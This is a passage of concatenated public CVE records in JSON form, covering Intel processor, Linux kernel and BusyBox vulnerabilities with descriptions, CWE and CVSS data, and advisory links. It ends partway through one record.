{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T02:31:59.874Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00657.html" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20220923-0002/" }, { "name": "[debian-lts-announce] 20230401 [SECURITY] [DLA 3379-1] intel-microcode security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/04/msg00000.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Intel(R) Processors", "vendor": "n/a", "versions": [ { "status": "affected", "version": "See references" } ] } ], "descriptions": [ { "lang": "en", "value": "Improper isolation of shared resources in some Intel(R) Processors may allow a privileged user to potentially enable information disclosure via local access." } ], "problemTypes": [ { "descriptions": [ { "description": "information disclosure", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2023-04-01T00:00:00", "orgId": "6dda929c-bb53-4a77-a76d-48e79601a1ce", "shortName": "intel" }, "references": [ { "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00657.html" }, { "url": "https://security.netapp.com/advisory/ntap-20220923-0002/" }, { "name": "[debian-lts-announce] 20230401 [SECURITY] [DLA 3379-1] intel-microcode security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/04/msg00000.html" } ] } }, "cveMetadata": { "assignerOrgId": "6dda929c-bb53-4a77-a76d-48e79601a1ce", "assignerShortName": "intel", "cveId": "CVE-2022-21233", "datePublished": "2022-08-18T00:00:00", "dateReserved": "2022-02-03T00:00:00", "dateUpdated": "2024-08-03T02:31:59.874Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-42719
Vulnerability from cvelistv5
Published
2022-10-13 00:00
Modified
2024-08-03 13:10
Severity ?
EPSS score ?
Summary
A use-after-free in the mac80211 stack when parsing a multi-BSSID element in the Linux kernel 5.2 through 5.19.x before 5.19.16 could be used by attackers (able to inject WLAN frames) to crash the kernel and potentially execute code.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T13:10:41.474Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://bugzilla.suse.com/show_bug.cgi?id=1204051" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2022/10/13/2" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2022/10/13/5" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/wireless/wireless.git/commit/?id=ff05d4b45dd89b922578dac497dcabf57cf771c6" }, { "name": "FEDORA-2022-2cfbe17910", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GGHENNMLCWIQV2LLA56BJNFIUZ7WB4IY/" }, { "name": "FEDORA-2022-b948fc3cfb", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VNN3VFQPECS6D4PS6ZWD7AFXTOSJDSSR/" }, { "name": "FEDORA-2022-1a5b125ac6", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/S2KTU5LFZNQS7YNGE56MT46VHMXL3DD2/" }, { "name": "DSA-5257", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.debian.org/security/2022/dsa-5257" }, { "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230203-0008/" }, { "tags": [ "x_transferred" ], "url": "http://packetstormsecurity.com/files/171005/Kernel-Live-Patch-Security-Notice-LNS-0091-1.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "A use-after-free in the mac80211 stack when parsing a multi-BSSID element in the Linux kernel 5.2 through 5.19.x before 5.19.16 could be used by attackers (able to inject WLAN frames) to crash the kernel and potentially execute code." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2023-02-15T00:00:00", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://bugzilla.suse.com/show_bug.cgi?id=1204051" }, { "url": "http://www.openwall.com/lists/oss-security/2022/10/13/2" }, { "url": "http://www.openwall.com/lists/oss-security/2022/10/13/5" }, { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/wireless/wireless.git/commit/?id=ff05d4b45dd89b922578dac497dcabf57cf771c6" }, { "name": "FEDORA-2022-2cfbe17910", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GGHENNMLCWIQV2LLA56BJNFIUZ7WB4IY/" }, { "name": "FEDORA-2022-b948fc3cfb", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VNN3VFQPECS6D4PS6ZWD7AFXTOSJDSSR/" }, { "name": "FEDORA-2022-1a5b125ac6", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/S2KTU5LFZNQS7YNGE56MT46VHMXL3DD2/" }, { "name": "DSA-5257", "tags": [ "vendor-advisory" ], "url": "https://www.debian.org/security/2022/dsa-5257" }, { "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html" }, { "url": "https://security.netapp.com/advisory/ntap-20230203-0008/" }, { "url": "http://packetstormsecurity.com/files/171005/Kernel-Live-Patch-Security-Notice-LNS-0091-1.html" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2022-42719", "datePublished": "2022-10-13T00:00:00", "dateReserved": "2022-10-10T00:00:00", "dateUpdated": "2024-08-03T13:10:41.474Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-3635
Vulnerability from cvelistv5
Published
2022-10-21 00:00
Modified
2024-08-03 01:14
Severity ?
EPSS score ?
Summary
A vulnerability, which was classified as critical, has been found in Linux Kernel. Affected by this issue is the function tst_timer of the file drivers/atm/idt77252.c of the component IPsec. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. VDB-211934 is the identifier assigned to this vulnerability.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T01:14:03.270Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/klassert/ipsec-next.git/commit/?id=3f4093e2bf4673f218c0bf17d8362337c400e77b" }, { "tags": [ "x_transferred" ], "url": "https://vuldb.com/?id.211934" }, { "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Kernel", "vendor": "Linux", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "A vulnerability, which was classified as critical, has been found in Linux Kernel. Affected by this issue is the function tst_timer of the file drivers/atm/idt77252.c of the component IPsec. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. VDB-211934 is the identifier assigned to this vulnerability." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "LOW", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-119", "description": "CWE-119 Memory Corruption -\u003e CWE-416 Use After Free", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-11-01T00:00:00", "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5", "shortName": "VulDB" }, "references": [ { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/klassert/ipsec-next.git/commit/?id=3f4093e2bf4673f218c0bf17d8362337c400e77b" }, { "url": "https://vuldb.com/?id.211934" }, { "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html" } ], "title": "Linux Kernel IPsec idt77252.c tst_timer use after free", "x_generator": "vuldb.com" } }, "cveMetadata": { "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5", "assignerShortName": "VulDB", "cveId": "CVE-2022-3635", "datePublished": "2022-10-21T00:00:00", "dateReserved": "2022-10-21T00:00:00", "dateUpdated": "2024-08-03T01:14:03.270Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-0171
Vulnerability from cvelistv5
Published
2022-08-26 00:00
Modified
2024-08-02 23:18
Severity ?
EPSS score ?
Summary
A flaw was found in the Linux kernel. The existing KVM SEV API has a vulnerability that allows a non-root (host) user-level application to crash the host kernel by creating a confidential guest VM instance in AMD CPU that supports Secure Encrypted Virtualization (SEV).
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T23:18:41.799Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2038940" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=683412ccf61294d727ead4a73d97397396e69a6b" }, { "tags": [ "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2022-0171" }, { "name": "DSA-5257", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.debian.org/security/2022/dsa-5257" }, { "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "kernel", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Fixed in kernel 5.18-rc4" } ] } ], "descriptions": [ { "lang": "en", "value": "A flaw was found in the Linux kernel. The existing KVM SEV API has a vulnerability that allows a non-root (host) user-level application to crash the host kernel by creating a confidential guest VM instance in AMD CPU that supports Secure Encrypted Virtualization (SEV)." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-459", "description": "CWE-459 - Incomplete Cleanup.", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-11-01T00:00:00", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2038940" }, { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=683412ccf61294d727ead4a73d97397396e69a6b" }, { "url": "https://access.redhat.com/security/cve/CVE-2022-0171" }, { "name": "DSA-5257", "tags": [ "vendor-advisory" ], "url": "https://www.debian.org/security/2022/dsa-5257" }, { "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2022-0171", "datePublished": "2022-08-26T00:00:00", "dateReserved": "2022-01-10T00:00:00", "dateUpdated": "2024-08-02T23:18:41.799Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-1462
Vulnerability from cvelistv5
Published
2022-05-31 00:00
Modified
2024-08-03 00:03
Severity ?
EPSS score ?
Summary
An out-of-bounds read flaw was found in the Linux kernel’s TeleTYpe subsystem. The issue occurs in how a user triggers a race condition using ioctls TIOCSPTLCK and TIOCGPTPEER and TIOCSTI and TCXONC with leakage of memory in the flush_to_ldisc function. This flaw allows a local user to crash the system or read unauthorized random data from memory.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T00:03:06.282Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2078466" }, { "name": "[debian-lts-announce] 20221002 [SECURITY] [DLA 3131-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00000.html" }, { "tags": [ "x_transferred" ], "url": "https://seclists.org/oss-sec/2022/q2/155" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "kernel", "vendor": "n/a", "versions": [ { "status": "affected", "version": "no information yet" } ] } ], "descriptions": [ { "lang": "en", "value": "An out-of-bounds read flaw was found in the Linux kernel\u2019s TeleTYpe subsystem. The issue occurs in how a user triggers a race condition using ioctls TIOCSPTLCK and TIOCGPTPEER and TIOCSTI and TCXONC with leakage of memory in the flush_to_ldisc function. This flaw allows a local user to crash the system or read unauthorized random data from memory." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-362", "description": "CWE-362", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-10-17T00:00:00", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2078466" }, { "name": "[debian-lts-announce] 20221002 [SECURITY] [DLA 3131-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00000.html" }, { "url": "https://seclists.org/oss-sec/2022/q2/155" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2022-1462", "datePublished": "2022-05-31T00:00:00", "dateReserved": "2022-04-25T00:00:00", "dateUpdated": "2024-08-03T00:03:06.282Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-3303
Vulnerability from cvelistv5
Published
2022-09-27 00:00
Modified
2024-08-03 01:07
Severity ?
EPSS score ?
Summary
A race condition flaw was found in the Linux kernel sound subsystem due to improper locking. It could lead to a NULL pointer dereference while handling the SNDCTL_DSP_SYNC ioctl. A privileged local user (root or member of the audio group) could use this flaw to crash the system, resulting in a denial of service condition
References
Impacted products
Vendor | Product | Version | |
---|---|---|---|
▼ | n/a | Linux kernel |
Version: Fixed in kernel 6.0-rc5 |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T01:07:06.557Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=8423f0b6d513b259fdab9c9bf4aaa6188d054c2d" }, { "tags": [ "x_transferred" ], "url": "https://lore.kernel.org/all/CAFcO6XN7JDM4xSXGhtusQfS2mSBcx50VJKwQpCq=WeLt57aaZA%40mail.gmail.com/" }, { "name": "DSA-5257", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.debian.org/security/2022/dsa-5257" }, { "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Linux kernel", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Fixed in kernel 6.0-rc5" } ] } ], "descriptions": [ { "lang": "en", "value": "A race condition flaw was found in the Linux kernel sound subsystem due to improper locking. It could lead to a NULL pointer dereference while handling the SNDCTL_DSP_SYNC ioctl. A privileged local user (root or member of the audio group) could use this flaw to crash the system, resulting in a denial of service condition" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-667", "description": "CWE-667-\u003eCWE-362-\u003eCWE-476", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-11-01T00:00:00", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=8423f0b6d513b259fdab9c9bf4aaa6188d054c2d" }, { "url": "https://lore.kernel.org/all/CAFcO6XN7JDM4xSXGhtusQfS2mSBcx50VJKwQpCq=WeLt57aaZA%40mail.gmail.com/" }, { "name": "DSA-5257", "tags": [ "vendor-advisory" ], "url": "https://www.debian.org/security/2022/dsa-5257" }, { "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2022-3303", "datePublished": "2022-09-27T00:00:00", "dateReserved": "2022-09-26T00:00:00", "dateUpdated": "2024-08-03T01:07:06.557Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2021-42374
Vulnerability from cvelistv5
Published
2021-11-15 00:00
Modified
2024-08-04 03:30
Severity ?
EPSS score ?
Summary
An out-of-bounds heap read in Busybox's unlzma applet leads to information leak and denial of service when crafted LZMA-compressed input is decompressed. This can be triggered by any applet/format that
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T03:30:38.452Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/" }, { "name": "FEDORA-2021-5a95823596", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/" }, { "name": "FEDORA-2021-c52c0fe490", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20211223-0002/" }, { "tags": [ "x_transferred" ], "url": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "busybox", "vendor": "busybox", "versions": [ { "lessThan": "1.34.0", "status": "affected", "version": "unspecified", "versionType": "custom" } ] } ], "descriptions": [ { "lang": "en", "value": "An out-of-bounds heap read in Busybox\u0027s unlzma applet leads to information leak and denial of service when crafted LZMA-compressed input is decompressed. This can be triggered by any applet/format that" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-125", "description": "CWE-125", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-04-25T00:00:00", "orgId": "48a46f29-ae42-4e1d-90dd-c1676c1e5e6d", "shortName": "JFROG" }, "references": [ { "url": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/" }, { "name": "FEDORA-2021-5a95823596", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/" }, { "name": "FEDORA-2021-c52c0fe490", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/" }, { "url": "https://security.netapp.com/advisory/ntap-20211223-0002/" }, { "url": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog" } ] } }, "cveMetadata": { "assignerOrgId": "48a46f29-ae42-4e1d-90dd-c1676c1e5e6d", "assignerShortName": "JFROG", "cveId": "CVE-2021-42374", "datePublished": "2021-11-15T00:00:00", "dateReserved": "2021-10-14T00:00:00", "dateUpdated": "2024-08-04T03:30:38.452Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2021-42378
Vulnerability from cvelistv5
Published
2021-11-15 00:00
Modified
2024-08-04 03:30
Severity ?
EPSS score ?
Summary
A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the getvar_i function
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T03:30:38.552Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/" }, { "name": "FEDORA-2021-5a95823596", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/" }, { "name": "FEDORA-2021-c52c0fe490", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20211223-0002/" }, { "tags": [ "x_transferred" ], "url": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "busybox", "vendor": "busybox", "versions": [ { "lessThan": "1.34.0", "status": "affected", "version": "unspecified", "versionType": "custom" } ] } ], "descriptions": [ { "lang": "en", "value": "A use-after-free in Busybox\u0027s awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the getvar_i function" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "CWE-416", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-04-25T00:00:00", "orgId": "48a46f29-ae42-4e1d-90dd-c1676c1e5e6d", "shortName": "JFROG" }, "references": [ { "url": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/" }, { "name": "FEDORA-2021-5a95823596", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/" }, { "name": "FEDORA-2021-c52c0fe490", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/" }, { "url": "https://security.netapp.com/advisory/ntap-20211223-0002/" }, { "url": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog" } ] } }, "cveMetadata": { "assignerOrgId": "48a46f29-ae42-4e1d-90dd-c1676c1e5e6d", "assignerShortName": "JFROG", "cveId": "CVE-2021-42378", "datePublished": "2021-11-15T00:00:00", "dateReserved": "2021-10-14T00:00:00", "dateUpdated": "2024-08-04T03:30:38.552Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-3625
Vulnerability from cvelistv5
Published
2022-10-21 00:00
Modified
2024-08-03 01:14
Severity ?
EPSS score ?
Summary
A vulnerability was found in Linux Kernel. It has been classified as critical. This affects the function devlink_param_set/devlink_param_get of the file net/core/devlink.c of the component IPsec. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The identifier VDB-211929 was assigned to this vulnerability.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T01:14:02.495Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/klassert/ipsec-next.git/commit/?id=6b4db2e528f650c7fb712961aac36455468d5902" }, { "tags": [ "x_transferred" ], "url": "https://vuldb.com/?id.211929" }, { "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Kernel", "vendor": "Linux", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "A vulnerability was found in Linux Kernel. It has been classified as critical. This affects the function devlink_param_set/devlink_param_get of the file net/core/devlink.c of the component IPsec. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The identifier VDB-211929 was assigned to this vulnerability." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "LOW", "baseScore": 4.6, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-119", "description": "CWE-119 Memory Corruption -\u003e CWE-416 Use After Free", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-11-01T00:00:00", "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5", "shortName": "VulDB" }, "references": [ { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/klassert/ipsec-next.git/commit/?id=6b4db2e528f650c7fb712961aac36455468d5902" }, { "url": "https://vuldb.com/?id.211929" }, { "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html" } ], "title": "Linux Kernel IPsec devlink.c devlink_param_get use after free", "x_generator": "vuldb.com" } }, "cveMetadata": { "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5", "assignerShortName": "VulDB", "cveId": "CVE-2022-3625", "datePublished": "2022-10-21T00:00:00", "dateReserved": "2022-10-21T00:00:00", "dateUpdated": "2024-08-03T01:14:02.495Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-21166
Vulnerability from cvelistv5
Published
2022-06-15 20:03
Modified
2024-08-03 02:31
Severity ?
EPSS score ?
Summary
Incomplete cleanup in specific special register write operations for some Intel(R) Processors may allow an authenticated user to potentially enable information disclosure via local access.
References
Impacted products
Vendor | Product | Version | |
---|---|---|---|
▼ | n/a | Intel(R) Processors |
Version: See references |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T02:31:59.119Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00615.html" }, { "name": "[oss-security] 20220616 Xen Security Advisory 404 v2 (CVE-2022-21123,CVE-2022-21125,CVE-2022-21166) - x86: MMIO Stale Data vulnerabilities", "tags": [ "mailing-list", "x_refsource_MLIST", "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2022/06/16/1" }, { "name": "FEDORA-2022-391e24517d", "tags": [ "vendor-advisory", "x_refsource_FEDORA", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FHTEW3RXU2GW6S3RCPQG4VNCZGI3TOSV/" }, { "name": "FEDORA-2022-177a008b98", "tags": [ "vendor-advisory", "x_refsource_FEDORA", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/T4P2KJYL74KGLHE4JZETVW7PZH6ZIABA/" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20220624-0008/" }, { "name": "FEDORA-2022-925fc688c1", "tags": [ "vendor-advisory", "x_refsource_FEDORA", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MCVOMHBQRH4KP7IN6U24CW7F2D2L5KBS/" }, { "name": "[debian-lts-announce] 20220701 [SECURITY] [DLA 3065-1] linux security update", "tags": [ "mailing-list", "x_refsource_MLIST", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/07/msg00000.html" }, { "name": "DSA-5173", "tags": [ 